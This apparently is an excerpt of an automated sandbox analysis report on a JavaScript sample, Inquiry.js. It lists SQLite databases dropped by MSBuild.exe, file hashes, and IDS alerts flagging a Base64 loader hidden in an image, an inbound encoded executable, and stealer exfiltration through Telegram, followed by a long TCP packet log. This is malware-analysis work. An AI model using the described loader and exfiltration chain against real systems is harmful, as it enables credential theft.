                                                                                                                                                  SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):126976
                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):126976
                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):0.35814247679553607
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TLiNfJyq1YA5yEHFxOUwa5qguyZ75fOSme2d:TLizym8I6Uwcc25fBlC
                                                                                                                                                  MD5:F44DC73F9788D3313E3E25140002587C
                                                                                                                                                  SHA1:5AEC4EDC356BC673CBA64FF31148B934A41D44C4
                                                                                                                                                  SHA-256:2002C1E5693DD638D840BB9FB04D765482D06BA3106623CE90F6E8E42067A983
                                                                                                                                                  SHA-512:E556E3C32C0BC142B08E5C479BF31B6101C9200896DD7FCD74FDD39B2DAEAC8F6DC9BA4F09F3C6715998015AF7317211082D9C811E5F9E32493C9ECD888875D7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  File type:Unicode text, UTF-8 text, with very long lines (440), with CRLF line terminators
                                                                                                                                                  Entropy (8bit):5.134946748487084
                                                                                                                                                  TrID:
                                                                                                                                                    File name:Inquiry.js
                                                                                                                                                    File size:166'867 bytes
                                                                                                                                                    MD5:459f759046d6def3f4524d28eab22476
                                                                                                                                                    SHA1:46af0da70b77d98d4773023554dacc1f968b93a1
                                                                                                                                                    SHA256:70a82edf7f26167e6b7df16d624d29d45fd220bb47b8407bc58ee6f7b8c822d3
                                                                                                                                                    SHA512:f440b3263f621ddc3113084c7aa8a9acc876c19c97138f0c923d2a65f30203d3d4141f49bf0997b9426f60c42f667094d74e0e3f8fff2fabebf938fdd0cdf264
                                                                                                                                                    SSDEEP:1536:DCd0yFOp29X3u7EWFOm3xE7E9GQ0c4RTXN4uzQ6VJYCkR5O+6puYszWTC4mKcAWy:DCdTFOE9OoWlN0XJzQ6VPk7yx
                                                                                                                                                    TLSH:1CF3D848BDA9A01082B3333A4F2F5A09EEB945231815E154FA9CD3D13FB1525C5BAFBD
                                                                                                                                                    File Content Preview:..var martialities = new ActiveXObject("Microsoft.XMLDOM");..martialities.async = false;......var shirky = "http://schemas.microsoft.com/windows/2003/08/printing/printschemakeywords";..var upcasting = "http://schemas.microsoft.com/windows/2013/05/printing
                                                                                                                                                    Icon Hash:68d69b8bb6aa9a86
                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2025-01-15T09:58:14.455724+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21207.241.227.155443192.168.2.449731TCP
                                                                                                                                                    2025-01-15T09:58:36.298396+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1162.241.87.113443192.168.2.449738TCP
                                                                                                                                                    2025-01-15T09:58:45.764341+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.449741149.154.167.220443TCP
                                                                                                                                                    2025-01-15T09:58:46.260913+01002855039ETPRO MALWARE UNK Stealer Telegram Exfil1192.168.2.449741149.154.167.220443TCP
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 15, 2025 09:58:07.971973896 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:07.972038984 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:07.972126007 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:07.988573074 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:07.988586903 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:08.774586916 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:08.774692059 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:08.856812000 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:08.856889009 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:08.857846975 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:08.858046055 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:08.861897945 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:08.903409004 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025376081 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025444031 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025485992 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.025527954 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025548935 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.025599957 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.025612116 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025665045 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.025760889 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.025820971 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.027983904 CET49730443192.168.2.423.186.113.60
                                                                                                                                                    Jan 15, 2025 09:58:09.028017998 CET4434973023.186.113.60192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:09.689726114 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                    Jan 15, 2025 09:58:11.521364927 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:11.521397114 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:11.521486044 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:11.532099962 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:11.532118082 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.146471977 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.146606922 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.149315119 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.149328947 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.149821997 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.155328035 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.199328899 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.434012890 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.434081078 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.434196949 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.434380054 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.434410095 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.434607983 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.459964991 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.460036039 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.460258007 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.460258007 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.460279942 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.460496902 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.499063969 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.499133110 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.499293089 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.499293089 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.499320030 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.499377966 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.549603939 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.549664021 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.549699068 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.549714088 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.549751997 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.549777985 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.551852942 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.551923037 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.551943064 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.551954031 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.551981926 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.552002907 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.552403927 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.552453041 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.552486897 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.552494049 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.552527905 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.552547932 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.615108967 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.615168095 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.615212917 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.615225077 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.615288973 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.640324116 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.640383005 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.640417099 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.640430927 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.640475035 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.640500069 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.641668081 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.641727924 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.641756058 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.641763926 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.641802073 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.641825914 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.642383099 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.642426968 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.642458916 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.642466068 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.642503023 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.642534971 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.643985033 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.644026995 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.644062042 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.644068956 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.644103050 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.644126892 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.644927979 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.644968987 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.645001888 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.645009995 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.645046949 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.645067930 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680406094 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680464029 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680519104 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680531979 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680691004 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680691004 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680695057 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680730104 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680761099 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680787086 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680798054 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680813074 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.680843115 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.680883884 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.705739021 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.705801010 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.705873966 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.705883026 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.706042051 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731092930 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731162071 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731342077 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731342077 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731353045 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731384039 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731430054 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731436014 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731473923 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731482029 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.731523037 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.731555939 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.732043982 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.732089996 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.732125998 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.732132912 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.732176065 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.732203960 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.732955933 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.733005047 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.733040094 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.733047009 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.733097076 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.733124971 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.736812115 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.736884117 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.737046003 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.737056017 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.737109900 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.771517992 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.771580935 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.771687984 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.771687984 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.771720886 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.771785021 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.796343088 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.796402931 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.796468019 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.796498060 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.796523094 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.796547890 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.821836948 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.821897030 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.821964979 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.821973085 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.822020054 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822033882 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.822053909 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822065115 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.822094917 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.822103024 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822148085 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822154999 CET44349731207.241.227.155192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:12.822187901 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822235107 CET49731443192.168.2.4207.241.227.155
                                                                                                                                                    Jan 15, 2025 09:58:12.822254896 CET44349731207.241.227.155192.168.2.4
